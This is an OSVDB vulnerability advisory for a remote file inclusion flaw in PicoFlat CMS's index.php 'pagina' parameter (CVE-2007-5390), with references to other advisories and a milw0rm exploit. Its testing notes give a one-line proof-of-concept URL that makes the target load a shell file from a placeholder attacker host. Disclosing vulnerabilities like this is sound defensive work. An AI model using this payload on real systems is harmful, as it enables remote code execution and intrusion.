PicoFlat CMS index.php pagina Variable Remote File Inclusion

2007-10-11T00:00:00
ID OSVDB:37686
Type osvdb
Reporter OSVDB
Modified 2007-10-11T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?pagina=http://[attacker]/shell.txt?

References:

Secunia Advisory ID:27208 Other Advisory URL: http://milw0rm.com/exploits/4520 CVE-2007-5390 Bugtraq ID: 26043